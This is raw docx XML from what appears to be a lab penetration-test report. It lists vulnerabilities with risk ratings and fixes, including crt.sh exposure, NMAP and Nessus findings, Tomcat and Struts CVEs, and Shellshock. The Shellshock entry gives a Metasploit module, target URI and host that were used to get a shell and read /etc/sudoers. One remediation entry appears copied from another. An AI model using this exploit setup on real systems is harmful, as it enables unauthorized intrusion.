          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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3C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Utilize GoDaddy’s ability to private this information. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability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1">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42">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Open Source Exposed Data </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000243">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4">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45">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6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="0000ff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium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7">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8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Stored Certificate on crt.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000249">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A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1612900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="23"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4657725" cy="1612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B">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C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3.33.130.190</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">15.197.148.33</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024E">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4F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Protect information from being stored and revealed on crt.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability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4">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55">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Aggressive Scan NMAP Results </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000256">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7">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58">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9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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A">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B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">An aggressive NMAP scan revealed 5 hosts with exposed ip addresses. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025C">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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="304800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="24"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65772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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="4927600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="18"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4657725"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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2603500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="25"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4657725" cy="2603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0">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1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000262">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000263">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.12</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000264">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.13</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000265">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000266">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67">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Block unauthorized connections from these IP addresses. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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6A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability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6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6C">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6D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nessus Scan Results </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">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F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000270">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1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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2">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3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">A Nessus scan of the IP address 192.168.13.12 revealed a critical CGI abuse vulnerability. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000274">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5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1498600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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4657725"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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2717800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="28"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4657725" cy="2717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8">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7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7A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Upgrade to Apache Struts Version 2.3.32 / 2.5.10.1 or later. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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7D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 16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F">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80">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache Tomcat Remote Code Execution Vulnerability (CVE-2017-12617)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000281">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2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000283">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000285">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6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Using the results from the nessus scan a remote session was able to be created connecting to 192.168.13.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000287">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8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2870200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="11"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657725" cy="2870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A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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8C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Upgrade to Apache Struts Version 2.3.32 / 2.5.10.1 or later. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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8F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 17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9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91">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92">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell Shock Reverse TCP </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000293">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4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000295">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Rating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rPr>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000297">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8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Utilizing:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000299">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/multi/http/apache_mod_cgi_bash_env_exec</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGETURI /cgi-bin/shockme.cgi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">RHOST 192.168.13.11</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">A shell session was able to be created where access to /etc/sudoers was gained. This posed a major security risk as an attacker would ultimately have complete access from here and would be able to grant themselves whatever privileges they wished. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2197100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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4657725" cy="2197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0">
            <w:pPr>
              <w:widowControl w:val="0"/>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2A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A2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Edit the sudo file to limit access for all sudo accounts. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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A5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 18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A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A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A8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Struts - CVE-2017-5638</w:t>
            </w:r>
          </w:p>
        </w:tc>
